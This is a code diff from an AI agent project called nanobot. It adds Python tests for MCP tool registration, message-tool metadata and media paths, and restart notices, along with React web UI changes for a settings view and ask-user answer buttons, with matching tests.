@pytest.mark.asyncio
async def test_connect_mcp_servers_enabled_tools_matches_sanitized_name(
fake_mcp_runtime: dict[str, object | None],
) -> None:
fake_mcp_runtime["session"] = _make_fake_session_with_capabilities(
tool_names=["My Tool", "other"],
)
registry = ToolRegistry()
stacks = await connect_mcp_servers(
{"test": MCPServerConfig(command="fake", enabled_tools=["mcp_test_My_Tool"])},
registry,
)
for stack in stacks.values():
await stack.aclose()
assert registry.tool_names == ["mcp_test_My_Tool"]

View File

@ -1,6 +1,10 @@
import os
import pytest
from nanobot.agent.tools.message import MessageTool
from nanobot.bus.events import OutboundMessage
from nanobot.config.paths import get_workspace_path
@pytest.mark.asyncio
@ -29,3 +33,172 @@ async def test_message_tool_rejects_malformed_buttons(bad) -> None:
content="hi", channel="telegram", chat_id="1", buttons=bad,
)
assert result == "Error: buttons must be a list of list of strings"
@pytest.mark.asyncio
async def test_message_tool_marks_channel_delivery_only_when_enabled() -> None:
sent: list[OutboundMessage] = []
async def _send(msg: OutboundMessage) -> None:
sent.append(msg)
tool = MessageTool(send_callback=_send)
await tool.execute(content="normal", channel="telegram", chat_id="1")
token = tool.set_record_channel_delivery(True)
try:
await tool.execute(content="cron", channel="telegram", chat_id="1")
finally:
tool.reset_record_channel_delivery(token)
assert sent[0].metadata == {}
assert sent[1].metadata == {"_record_channel_delivery": True}
@pytest.mark.asyncio
async def test_message_tool_inherits_metadata_for_same_target() -> None:
sent: list[OutboundMessage] = []
async def _send(msg: OutboundMessage) -> None:
sent.append(msg)
tool = MessageTool(send_callback=_send)
slack_meta = {"slack": {"thread_ts": "111.222", "channel_type": "channel"}}
tool.set_context("slack", "C123", metadata=slack_meta)
await tool.execute(content="thread reply")
assert sent[0].metadata == slack_meta
@pytest.mark.asyncio
async def test_message_tool_does_not_inherit_metadata_for_cross_target() -> None:
sent: list[OutboundMessage] = []
async def _send(msg: OutboundMessage) -> None:
sent.append(msg)
tool = MessageTool(send_callback=_send)
tool.set_context(
"slack",
"C123",
metadata={"slack": {"thread_ts": "111.222", "channel_type": "channel"}},
)
await tool.execute(content="channel reply", channel="slack", chat_id="C999")
assert sent[0].metadata == {}
@pytest.mark.asyncio
async def test_message_tool_resolves_relative_media_paths() -> None:
sent: list[OutboundMessage] = []
async def _send(msg: OutboundMessage) -> None:
sent.append(msg)
tool = MessageTool(send_callback=_send)
await tool.execute(
content="see attached",
channel="telegram",
chat_id="1",
media=["output/image.png"],
)
expected = str(get_workspace_path() / "output/image.png")
assert sent[0].media == [expected]
@pytest.mark.asyncio
async def test_message_tool_resolves_relative_media_paths_from_active_workspace(tmp_path) -> None:
sent: list[OutboundMessage] = []
async def _send(msg: OutboundMessage) -> None:
sent.append(msg)
workspace = tmp_path / "workspace"
tool = MessageTool(send_callback=_send, workspace=workspace)
await tool.execute(
content="see attached",
channel="telegram",
chat_id="1",
media=["output/image.png"],
)
assert sent[0].media == [str(workspace / "output/image.png")]
@pytest.mark.asyncio
async def test_message_tool_passes_through_absolute_media_paths() -> None:
sent: list[OutboundMessage] = []
async def _send(msg: OutboundMessage) -> None:
sent.append(msg)
tool = MessageTool(send_callback=_send)
abs_path = os.path.abspath(os.path.join(os.sep, "tmp", "abs_image.png"))
await tool.execute(
content="see attached",
channel="telegram",
chat_id="1",
media=[abs_path],
)
assert sent[0].media == [abs_path]
@pytest.mark.asyncio
async def test_message_tool_passes_through_url_media_paths() -> None:
sent: list[OutboundMessage] = []
async def _send(msg: OutboundMessage) -> None:
sent.append(msg)
tool = MessageTool(send_callback=_send)
url = "https://example.com/image.png"
await tool.execute(
content="see attached",
channel="telegram",
chat_id="1",
media=[url],
)
assert sent[0].media == [url]
@pytest.mark.asyncio
async def test_message_tool_resolves_mixed_media_paths() -> None:
sent: list[OutboundMessage] = []
async def _send(msg: OutboundMessage) -> None:
sent.append(msg)
tool = MessageTool(send_callback=_send)
abs_path = os.path.abspath(os.path.join(os.sep, "tmp", "absolute.png"))
await tool.execute(
content="see attached",
channel="telegram",
chat_id="1",
media=[
"output/relative.png",
abs_path,
"https://example.com/url.png",
"http://example.com/http.png",
],
)
expected_relative = str(get_workspace_path() / "output/relative.png")
assert sent[0].media == [
expected_relative,
abs_path,
"https://example.com/url.png",
"http://example.com/http.png",
]

View File

@ -16,6 +16,7 @@ from nanobot.utils.restart import (
def test_set_and_consume_restart_notice_env_roundtrip(monkeypatch):
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_CHANNEL", raising=False)
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_CHAT_ID", raising=False)
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_METADATA", raising=False)
monkeypatch.delenv("NANOBOT_RESTART_STARTED_AT", raising=False)
set_restart_notice_to_env(channel="feishu", chat_id="oc_123")
@ -25,14 +26,42 @@ def test_set_and_consume_restart_notice_env_roundtrip(monkeypatch):
assert notice.channel == "feishu"
assert notice.chat_id == "oc_123"
assert notice.started_at_raw
assert notice.metadata == {}
# Consumed values should be cleared from env.
assert consume_restart_notice_from_env() is None
assert "NANOBOT_RESTART_NOTIFY_CHANNEL" not in os.environ
assert "NANOBOT_RESTART_NOTIFY_CHAT_ID" not in os.environ
assert "NANOBOT_RESTART_NOTIFY_METADATA" not in os.environ
assert "NANOBOT_RESTART_STARTED_AT" not in os.environ
def test_restart_notice_preserves_metadata_across_env(monkeypatch):
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_CHANNEL", raising=False)
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_CHAT_ID", raising=False)
monkeypatch.delenv("NANOBOT_RESTART_NOTIFY_METADATA", raising=False)
monkeypatch.delenv("NANOBOT_RESTART_STARTED_AT", raising=False)
set_restart_notice_to_env(
channel="slack",
chat_id="C123",
metadata={"slack": {"thread_ts": "1700.42", "channel_type": "channel"}},
)
notice = consume_restart_notice_from_env()
assert notice is not None
assert notice.metadata == {
"slack": {"thread_ts": "1700.42", "channel_type": "channel"}
}
assert "NANOBOT_RESTART_NOTIFY_METADATA" not in os.environ
def test_restart_notice_clears_stale_metadata(monkeypatch):
monkeypatch.setenv("NANOBOT_RESTART_NOTIFY_METADATA", '{"stale": true}')
set_restart_notice_to_env(channel="cli", chat_id="direct")
assert "NANOBOT_RESTART_NOTIFY_METADATA" not in os.environ
def test_format_restart_completed_message_with_elapsed(monkeypatch):
monkeypatch.setattr("nanobot.utils.restart.time.time", lambda: 102.0)
assert format_restart_completed_message("100.0") == "Restart completed in 2.0s."

View File

@ -2,6 +2,7 @@ import { useCallback, useEffect, useMemo, useRef, useState } from "react";
import { useTranslation } from "react-i18next";
import { DeleteConfirm } from "@/components/DeleteConfirm";
import { Sidebar } from "@/components/Sidebar";
import { SettingsView } from "@/components/settings/SettingsView";
import { ThreadShell } from "@/components/thread/ThreadShell";
import { Sheet, SheetContent } from "@/components/ui/sheet";
import { preloadMarkdownText } from "@/components/MarkdownText";
@ -25,6 +26,7 @@ type BootState =
const SIDEBAR_STORAGE_KEY = "nanobot-webui.sidebar";
const SIDEBAR_WIDTH = 279;
type ShellView = "chat" | "settings";
function readSidebarOpen(): boolean {
if (typeof window === "undefined") return true;
@ -136,22 +138,29 @@ export default function App() {
);
}
const handleModelNameChange = (modelName: string | null) => {
setState((current) =>
current.status === "ready" ? { ...current, modelName } : current,
);
};
return (
<ClientProvider
client={state.client}
token={state.token}
modelName={state.modelName}
>
<Shell />
<Shell onModelNameChange={handleModelNameChange} />
</ClientProvider>
);
}
function Shell() {
function Shell({ onModelNameChange }: { onModelNameChange: (modelName: string | null) => void }) {
const { t, i18n } = useTranslation();
const { theme, toggle } = useTheme();
const { sessions, loading, refresh, createChat, deleteChat } = useSessions();
const [activeKey, setActiveKey] = useState<string | null>(null);
const [view, setView] = useState<ShellView>("chat");
const [desktopSidebarOpen, setDesktopSidebarOpen] =
useState<boolean>(readSidebarOpen);
const [mobileSidebarOpen, setMobileSidebarOpen] = useState(false);
@ -208,6 +217,7 @@ function Shell() {
try {
const chatId = await createChat();
setActiveKey(`websocket:${chatId}`);
setView("chat");
setMobileSidebarOpen(false);
return chatId;
} catch (e) {
@ -219,6 +229,7 @@ function Shell() {
const onSelectChat = useCallback(
(key: string) => {
setActiveKey(key);
setView("chat");
setMobileSidebarOpen(false);
},
[],
@ -266,6 +277,11 @@ function Shell() {
onRefresh: () => void refresh(),
onRequestDelete: (key: string, label: string) =>
setPendingDelete({ key, label }),
activeView: view,
onOpenSettings: () => {
setView("settings" as const);
setMobileSidebarOpen(false);
},
};
return (
@ -303,14 +319,23 @@ function Shell() {
</Sheet>
<main className="flex h-full min-w-0 flex-1 flex-col">
<ThreadShell
session={activeSession}
title={headerTitle}
onToggleSidebar={toggleSidebar}
onGoHome={() => setActiveKey(null)}
onNewChat={onNewChat}
hideSidebarToggleOnDesktop={desktopSidebarOpen}
/>
{view === "settings" ? (
<SettingsView
theme={theme}
onToggleTheme={toggle}
onBackToChat={() => setView("chat")}
onModelNameChange={onModelNameChange}
/>
) : (
<ThreadShell
session={activeSession}
title={headerTitle}
onToggleSidebar={toggleSidebar}
onGoHome={() => setActiveKey(null)}
onNewChat={onNewChat}
hideSidebarToggleOnDesktop={desktopSidebarOpen}
/>
)}
</main>
<DeleteConfirm

View File

@ -1,9 +1,8 @@
import { Moon, PanelLeftClose, Plus, RefreshCcw, Sun } from "lucide-react";
import { Moon, PanelLeftClose, RefreshCcw, Settings, SquarePen, Sun } from "lucide-react";
import { useTranslation } from "react-i18next";
import { ChatList } from "@/components/ChatList";
import { ConnectionBadge } from "@/components/ConnectionBadge";
import { LanguageSwitcher } from "@/components/LanguageSwitcher";
import { Button } from "@/components/ui/button";
import { Separator } from "@/components/ui/separator";
import type { ChatSummary } from "@/lib/types";
@ -19,48 +18,60 @@ interface SidebarProps {
onRefresh: () => void;
onRequestDelete: (key: string, label: string) => void;
onCollapse: () => void;
activeView?: "chat" | "settings";
onOpenSettings: () => void;
}
export function Sidebar(props: SidebarProps) {
const { t } = useTranslation();
return (
<aside className="flex h-full w-full flex-col border-r border-sidebar-border/70 bg-sidebar text-sidebar-foreground">
<div className="flex items-center justify-between px-2 py-2">
<Button
variant="ghost"
size="icon"
aria-label={t("sidebar.collapse")}
onClick={props.onCollapse}
className="h-7 w-7 rounded-lg text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
>
<PanelLeftClose className="h-3.5 w-3.5" />
</Button>
<Button
variant="ghost"
size="icon"
aria-label={t("sidebar.toggleTheme")}
onClick={props.onToggleTheme}
className="h-7 w-7 rounded-lg text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
>
{props.theme === "dark" ? (
<Sun className="h-3.5 w-3.5" />
) : (
<Moon className="h-3.5 w-3.5" />
)}
</Button>
<div className="flex items-center justify-between px-3 pb-2 pt-3">
<picture className="block min-w-0">
<source srcSet="/brand/nanobot_logo.webp" type="image/webp" />
<img
src="/brand/nanobot_logo.png"
alt="nanobot"
className="h-7 w-auto select-none object-contain"
draggable={false}
/>
</picture>
<div className="flex items-center gap-0.5">
<Button
variant="ghost"
size="icon"
aria-label={t("sidebar.toggleTheme")}
onClick={props.onToggleTheme}
className="h-7 w-7 rounded-lg text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
>
{props.theme === "dark" ? (
<Sun className="h-3.5 w-3.5" />
) : (
<Moon className="h-3.5 w-3.5" />
)}
</Button>
<Button
variant="ghost"
size="icon"
aria-label={t("sidebar.collapse")}
onClick={props.onCollapse}
className="h-7 w-7 rounded-lg text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
>
<PanelLeftClose className="h-3.5 w-3.5" />
</Button>
</div>
</div>
<div className="px-2 pb-2.5">
<div className="px-2 pb-2">
<Button
onClick={props.onNewChat}
className="h-8.5 w-full justify-start gap-2 rounded-lg border border-sidebar-border/80 bg-card/25 px-3 text-[13px] font-medium text-sidebar-foreground shadow-none hover:bg-sidebar-accent/80"
variant="outline"
className="h-9 w-full justify-start gap-2 rounded-full px-3 text-[13px] font-medium text-sidebar-foreground/90 hover:bg-sidebar-accent hover:text-sidebar-foreground"
variant="ghost"
>
<Plus className="h-3.5 w-3.5" />
<SquarePen className="h-3.5 w-3.5" />
{t("sidebar.newChat")}
</Button>
</div>
<Separator className="bg-sidebar-border/70" />
<div className="flex items-center justify-between px-2.5 py-2 text-[11px] font-medium text-muted-foreground">
<div className="flex items-center justify-between px-3 pb-1.5 pt-2.5 text-[11px] font-medium text-muted-foreground">
<span>{t("sidebar.recent")}</span>
<Button
variant="ghost"
@ -81,10 +92,17 @@ export function Sidebar(props: SidebarProps) {
onRequestDelete={props.onRequestDelete}
/>
</div>
<Separator className="bg-sidebar-border/70" />
<Separator className="bg-sidebar-border/50" />
<div className="flex items-center justify-between gap-2 px-2.5 py-2 text-xs">
<ConnectionBadge />
<LanguageSwitcher />
<Button
onClick={props.onOpenSettings}
className="h-7 gap-1.5 rounded-md px-2 text-[11px] text-muted-foreground hover:bg-sidebar-accent hover:text-sidebar-foreground"
variant={props.activeView === "settings" ? "secondary" : "ghost"}
>
<Settings className="h-3.5 w-3.5" />
Settings
</Button>
</div>
</aside>
);

View File

@ -0,0 +1,245 @@
import { useCallback, useEffect, useMemo, useState } from "react";
import { ChevronLeft, Loader2 } from "lucide-react";
import { LanguageSwitcher } from "@/components/LanguageSwitcher";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { fetchSettings, updateSettings } from "@/lib/api";
import { cn } from "@/lib/utils";
import { useClient } from "@/providers/ClientProvider";
import type { SettingsPayload } from "@/lib/types";
interface SettingsViewProps {
theme: "light" | "dark";
onToggleTheme: () => void;
onBackToChat: () => void;
onModelNameChange: (modelName: string | null) => void;
}
export function SettingsView({
onBackToChat,
onModelNameChange,
}: SettingsViewProps) {
const { token } = useClient();
const [settings, setSettings] = useState<SettingsPayload | null>(null);
const [loading, setLoading] = useState(true);
const [saving, setSaving] = useState(false);
const [error, setError] = useState<string | null>(null);
const [form, setForm] = useState({
model: "",
provider: "auto",
});
const applyPayload = useCallback((payload: SettingsPayload) => {
setSettings(payload);
setForm({
model: payload.agent.model,
provider: payload.agent.provider,
});
}, []);
useEffect(() => {
let cancelled = false;
setLoading(true);
fetchSettings(token)
.then((payload) => {
if (!cancelled) {
applyPayload(payload);
setError(null);
}
})
.catch((err) => {
if (!cancelled) setError((err as Error).message);
})
.finally(() => {
if (!cancelled) setLoading(false);
});
return () => {
cancelled = true;
};
}, [applyPayload, token]);
const dirty = useMemo(() => {
if (!settings) return false;
return (
form.model !== settings.agent.model ||
form.provider !== settings.agent.provider
);
}, [form, settings]);
const save = async () => {
if (!dirty || saving) return;
setSaving(true);
try {
const payload = await updateSettings(token, form);
applyPayload(payload);
onModelNameChange(payload.agent.model || null);
setError(null);
} catch (err) {
setError((err as Error).message);
} finally {
setSaving(false);
}
};
return (
<div className="min-h-0 flex-1 overflow-y-auto bg-background">
<main className="mx-auto w-full max-w-[1000px] px-6 py-6">
<button
type="button"
onClick={onBackToChat}
className="mb-4 inline-flex items-center gap-1.5 text-xs font-medium text-muted-foreground hover:text-foreground"
>
<ChevronLeft className="h-3.5 w-3.5" />
Back to chat
</button>
<h1 className="mb-6 text-base font-semibold tracking-tight">General</h1>
{loading ? (
<div className="flex h-48 items-center justify-center text-sm text-muted-foreground">
<Loader2 className="mr-2 h-4 w-4 animate-spin" />
Loading settings...
</div>
) : error ? (
<SettingsGroup>
<SettingsRow title="Could not load settings">
<span className="max-w-[520px] text-sm text-muted-foreground">{error}</span>
</SettingsRow>
</SettingsGroup>
) : settings ? (
<SettingsSection
form={form}
setForm={setForm}
settings={settings}
dirty={dirty}
saving={saving}
onSave={save}
/>
) : null}
</main>
</div>
);
}
function SettingsSection({
form,
setForm,
settings,
dirty,
saving,
onSave,
}: {
form: {
model: string;
provider: string;
};
setForm: React.Dispatch<React.SetStateAction<{
model: string;
provider: string;
}>>;
settings: SettingsPayload;
dirty: boolean;
saving: boolean;
onSave: () => void;
}) {
return (
<div className="space-y-7">
<section>
<h2 className="mb-2 px-2 text-xs font-medium text-muted-foreground">AI</h2>
<SettingsGroup>
<SettingsRow title="Provider">
<select
value={form.provider}
onChange={(event) => setForm((prev) => ({ ...prev, provider: event.target.value }))}
className={cn(
"h-8 w-[210px] rounded-md border border-input bg-background px-2 text-sm",
"outline-none transition-colors hover:bg-accent focus-visible:ring-2 focus-visible:ring-ring",
)}
>
{settings.providers.map((provider) => (
<option key={provider.name} value={provider.name}>
{provider.label}
</option>
))}
</select>
</SettingsRow>
<SettingsRow title="Model">
<Input
value={form.model}
onChange={(event) => setForm((prev) => ({ ...prev, model: event.target.value }))}
className="h-8 w-[280px]"
/>
</SettingsRow>
{(dirty || saving || settings.requires_restart) ? (
<SettingsFooter
dirty={dirty}
saving={saving}
saved={settings.requires_restart && !dirty}
onSave={onSave}
/>
) : null}
</SettingsGroup>
</section>
<section>
<h2 className="mb-2 px-2 text-xs font-medium text-muted-foreground">Interface</h2>
<SettingsGroup>
<SettingsRow title="Language">
<LanguageSwitcher />
</SettingsRow>
</SettingsGroup>
</section>
</div>
);
}
function SettingsGroup({ children }: { children: React.ReactNode }) {
return (
<div className="overflow-hidden rounded-xl border border-border/60 bg-card/80">
<div className="divide-y divide-border/50">{children}</div>
</div>
);
}
function SettingsRow({
title,
children,
}: {
title: string;
children?: React.ReactNode;
}) {
return (
<div className="flex min-h-[52px] flex-col gap-3 px-3 py-2.5 sm:flex-row sm:items-center sm:justify-between">
<div className="min-w-0">
<div className="text-sm font-medium leading-5">{title}</div>
</div>
{children ? <div className="shrink-0 sm:ml-6">{children}</div> : null}
</div>
);
}
function SettingsFooter({
dirty,
saving,
saved,
onSave,
}: {
dirty: boolean;
saving: boolean;
saved: boolean;
onSave: () => void;
}) {
return (
<div className="flex min-h-[52px] items-center justify-between gap-4 px-3 py-2.5">
<div className="text-sm text-muted-foreground">
{saved ? "Saved. Restart nanobot to apply." : "Unsaved changes."}
</div>
<Button size="sm" variant="outline" onClick={onSave} disabled={!dirty || saving}>
{saving ? "Saving" : "Save"}
</Button>
</div>
);
}

View File

@ -0,0 +1,108 @@
import { useCallback, useEffect, useRef, useState } from "react";
import { MessageSquareText } from "lucide-react";
import { Button } from "@/components/ui/button";
import { cn } from "@/lib/utils";
interface AskUserPromptProps {
question: string;
buttons: string[][];
onAnswer: (answer: string) => void;
}
export function AskUserPrompt({
question,
buttons,
onAnswer,
}: AskUserPromptProps) {
const [customOpen, setCustomOpen] = useState(false);
const [custom, setCustom] = useState("");
const inputRef = useRef<HTMLTextAreaElement>(null);
const options = buttons.flat().filter(Boolean);
useEffect(() => {
if (customOpen) {
inputRef.current?.focus();
}
}, [customOpen]);
const submitCustom = useCallback(() => {
const answer = custom.trim();
if (!answer) return;
onAnswer(answer);
setCustom("");
setCustomOpen(false);
}, [custom, onAnswer]);
if (options.length === 0) return null;
return (
<div
className={cn(
"mx-auto mb-2 w-full max-w-[49.5rem] rounded-[16px] border border-primary/30",
"bg-card/95 p-3 shadow-sm backdrop-blur",
)}
role="group"
aria-label="Question"
>
<div className="mb-2 flex items-start gap-2">
<div className="mt-0.5 rounded-full bg-primary/10 p-1.5 text-primary">
<MessageSquareText className="h-3.5 w-3.5" aria-hidden />
</div>
<p className="min-w-0 flex-1 text-sm font-medium leading-5 text-foreground">
{question}
</p>
</div>
<div className="grid gap-1.5 sm:grid-cols-2">
{options.map((option) => (
<Button
key={option}
type="button"
variant="outline"
size="sm"
onClick={() => onAnswer(option)}
className="justify-start rounded-[10px] px-3 text-left"
>
<span className="truncate">{option}</span>
</Button>
))}
<Button
type="button"
variant="ghost"
size="sm"
onClick={() => setCustomOpen((open) => !open)}
className="justify-start rounded-[10px] px-3 text-muted-foreground"
>
Other...
</Button>
</div>
{customOpen ? (
<div className="mt-2 flex gap-2">
<textarea
ref={inputRef}
value={custom}
onChange={(event) => setCustom(event.target.value)}
onKeyDown={(event) => {
if (event.key === "Enter" && !event.shiftKey && !event.nativeEvent.isComposing) {
event.preventDefault();
submitCustom();
}
}}
rows={1}
placeholder="Type your own answer..."
className={cn(
"min-h-9 flex-1 resize-none rounded-[10px] border border-border/70 bg-background",
"px-3 py-2 text-sm leading-5 outline-none placeholder:text-muted-foreground",
"focus-visible:ring-1 focus-visible:ring-primary/40",
)}
/>
<Button type="button" size="sm" onClick={submitCustom} disabled={!custom.trim()}>
Send
</Button>
</div>
) : null}
</div>
);
}

View File

@ -1,6 +1,7 @@
import { useCallback, useEffect, useMemo, useRef, useState } from "react";
import { useTranslation } from "react-i18next";
import { AskUserPrompt } from "@/components/thread/AskUserPrompt";
import { ThreadComposer } from "@/components/thread/ThreadComposer";
import { ThreadHeader } from "@/components/thread/ThreadHeader";
import { StreamErrorNotice } from "@/components/thread/StreamErrorNotice";
@ -57,6 +58,21 @@ export function ThreadShell({
dismissStreamError,
} = useNanobotStream(chatId, initial);
const showHeroComposer = messages.length === 0 && !loading;
const pendingAsk = useMemo(() => {
for (let index = messages.length - 1; index >= 0; index -= 1) {
const message = messages[index];
if (message.kind === "trace") continue;
if (message.role === "user") return null;
if (message.role === "assistant" && message.buttons?.some((row) => row.length > 0)) {
return {
question: message.content,
buttons: message.buttons,
};
}
if (message.role === "assistant") return null;
}
return null;
}, [messages]);
useEffect(() => {
if (!chatId || loading) return;
@ -152,6 +168,13 @@ export function ThreadShell({
onDismiss={dismissStreamError}
/>
) : null}
{pendingAsk ? (
<AskUserPrompt
question={pendingAsk.question}
buttons={pendingAsk.buttons}
onAnswer={send}
/>
) : null}
{session ? (
<ThreadComposer
onSend={send}

View File

@ -160,13 +160,15 @@ export function useNanobotStream(
setIsStreaming(false);
setMessages((prev) => {
const filtered = activeId ? prev.filter((m) => m.id !== activeId) : prev;
const content = ev.buttons?.length ? (ev.button_prompt ?? ev.text) : ev.text;
return [
...filtered,
{
id: crypto.randomUUID(),
role: "assistant",
content: ev.text,
content,
createdAt: Date.now(),
...(ev.buttons && ev.buttons.length > 0 ? { buttons: ev.buttons } : {}),
...(media && media.length > 0 ? { media } : {}),
},
];

View File

@ -1,4 +1,4 @@
import type { ChatSummary } from "./types";
import type { ChatSummary, SettingsPayload, SettingsUpdate } from "./types";
export class ApiError extends Error {
status: number;
@ -104,3 +104,21 @@ export async function deleteSession(
);
return body.deleted;
}
export async function fetchSettings(
token: string,
base: string = "",
): Promise<SettingsPayload> {
return request<SettingsPayload>(`${base}/api/settings`, token);
}
export async function updateSettings(
token: string,
update: SettingsUpdate,
base: string = "",
): Promise<SettingsPayload> {
const query = new URLSearchParams();
if (update.model !== undefined) query.set("model", update.model);
if (update.provider !== undefined) query.set("provider", update.provider);
return request<SettingsPayload>(`${base}/api/settings/update?${query}`, token);
}

View File

@ -44,6 +44,8 @@ export interface UIMessage {
images?: UIImage[];
/** Signed or local UI-renderable media attachments. */
media?: UIMediaAttachment[];
/** Optional answer choices for a pending ask_user question. */
buttons?: string[][];
}
export interface ChatSummary {
@ -64,6 +66,28 @@ export interface BootstrapResponse {
model_name?: string | null;
}
export interface SettingsPayload {
agent: {
model: string;
provider: string;
resolved_provider: string | null;
has_api_key: boolean;
};
providers: Array<{
name: string;
label: string;
}>;
runtime: {
config_path: string;
};
requires_restart: boolean;
}
export interface SettingsUpdate {
model?: string;
provider?: string;
}
export type ConnectionStatus =
| "idle"
| "connecting"
@ -82,6 +106,9 @@ export type InboundEvent =
reply_to?: string;
media?: string[];
media_urls?: Array<{ url: string; name?: string }>;
buttons?: string[][];
/** Original prompt before the websocket text fallback appends buttons. */
button_prompt?: string;
/** Present when the frame is an agent breadcrumb (e.g. tool hint,
* generic progress line) rather than a conversational reply. */
kind?: "tool_hint" | "progress";

View File

@ -1,6 +1,6 @@
import { beforeEach, describe, expect, it, vi } from "vitest";
import { deleteSession, fetchSessionMessages } from "@/lib/api";
import { deleteSession, fetchSessionMessages, updateSettings } from "@/lib/api";
describe("webui API helpers", () => {
beforeEach(() => {
@ -34,4 +34,18 @@ describe("webui API helpers", () => {
}),
);
});
it("serializes settings updates as a narrow query string", async () => {
await updateSettings("tok", {
model: "openrouter/test",
provider: "openrouter",
});
expect(fetch).toHaveBeenCalledWith(
"/api/settings/update?model=openrouter%2Ftest&provider=openrouter",
expect.objectContaining({
headers: { Authorization: "Bearer tok" },
}),
);
});
});

View File

@ -146,4 +146,44 @@ describe("App layout", () => {
expect(screen.queryByText('Delete “First chat”?')).not.toBeInTheDocument();
expect(document.body.style.pointerEvents).not.toBe("none");
}, 15_000);
it("opens the Cursor-style settings view from the sidebar", async () => {
vi.stubGlobal(
"fetch",
vi.fn(async (input: RequestInfo | URL) => {
if (String(input).includes("/api/settings")) {
return {
ok: true,
status: 200,
json: async () => ({
agent: {
model: "openai/gpt-4o",
provider: "auto",
resolved_provider: "openai",
has_api_key: true,
},
providers: [
{ name: "auto", label: "Auto" },
{ name: "openai", label: "OpenAI" },
],
runtime: {
config_path: "/tmp/config.json",
},
requires_restart: false,
}),
};
}
return { ok: false, status: 404, json: async () => ({}) };
}),
);
render(<App />);
await waitFor(() => expect(connectSpy).toHaveBeenCalled());
fireEvent.click(screen.getByRole("button", { name: "Settings" }));
expect(await screen.findByRole("heading", { name: "General" })).toBeInTheDocument();
expect(screen.getByText("AI")).toBeInTheDocument();
expect(screen.getByDisplayValue("openai/gpt-4o")).toBeInTheDocument();
});
});

View File

@ -7,11 +7,22 @@ import { ClientProvider } from "@/providers/ClientProvider";
function makeClient() {
const errorHandlers = new Set<(err: { kind: string }) => void>();
const chatHandlers = new Map<string, Set<(ev: import("@/lib/types").InboundEvent) => void>>();
return {
status: "open" as const,
defaultChatId: null as string | null,
onStatus: () => () => {},
onChat: () => () => {},
onChat: (chatId: string, handler: (ev: import("@/lib/types").InboundEvent) => void) => {
let handlers = chatHandlers.get(chatId);
if (!handlers) {
handlers = new Set();
chatHandlers.set(chatId, handlers);
}
handlers.add(handler);
return () => {
handlers?.delete(handler);
};
},
onError: (handler: (err: { kind: string }) => void) => {
errorHandlers.add(handler);
return () => {
@ -21,6 +32,9 @@ function makeClient() {
_emitError(err: { kind: string }) {
for (const h of errorHandlers) h(err);
},
_emitChat(chatId: string, ev: import("@/lib/types").InboundEvent) {
for (const h of chatHandlers.get(chatId) ?? []) h(ev);
},
sendMessage: vi.fn(),
newChat: vi.fn(),
attach: vi.fn(),
@ -411,4 +425,46 @@ describe("ThreadShell", () => {
await waitFor(() => expect(screen.getByText("from chat b")).toBeInTheDocument());
expect(screen.queryByText("from chat a")).not.toBeInTheDocument();
});
it("renders ask_user options above the composer and sends selected answers", async () => {
const client = makeClient();
const onNewChat = vi.fn().mockResolvedValue("chat-a");
render(
wrap(
client,
<ThreadShell
session={session("chat-a")}
title="Chat chat-a"
onToggleSidebar={() => {}}
onGoHome={() => {}}
onNewChat={onNewChat}
/>,
),
);
await act(async () => {
client._emitChat("chat-a", {
event: "message",
chat_id: "chat-a",
text: "How should I continue?",
buttons: [["Short answer", "Detailed answer"]],
});
});
expect(screen.getByRole("group", { name: "Question" })).toHaveTextContent(
"How should I continue?",
);
fireEvent.click(screen.getByRole("button", { name: "Short answer" }));
expect(client.sendMessage).toHaveBeenCalledWith(
"chat-a",
"Short answer",
undefined,
);
await waitFor(() => {
expect(screen.queryByRole("group", { name: "Question" })).not.toBeInTheDocument();
});
});
});

View File

@ -113,4 +113,27 @@ describe("useNanobotStream", () => {
{ kind: "video", url: "/api/media/sig/payload", name: "demo.mp4" },
]);
});
it("keeps assistant buttons on complete messages", () => {
const fake = fakeClient();
const { result } = renderHook(() => useNanobotStream("chat-q", []), {
wrapper: wrap(fake.client),
});
act(() => {
fake.emit("chat-q", {
event: "message",
chat_id: "chat-q",
text: "How should I continue?\n\n1. Short answer\n2. Detailed answer",
button_prompt: "How should I continue?",
buttons: [["Short answer", "Detailed answer"]],
});
});
expect(result.current.messages).toHaveLength(1);
expect(result.current.messages[0].content).toBe("How should I continue?");
expect(result.current.messages[0].buttons).toEqual([
["Short answer", "Detailed answer"],
]);
});
});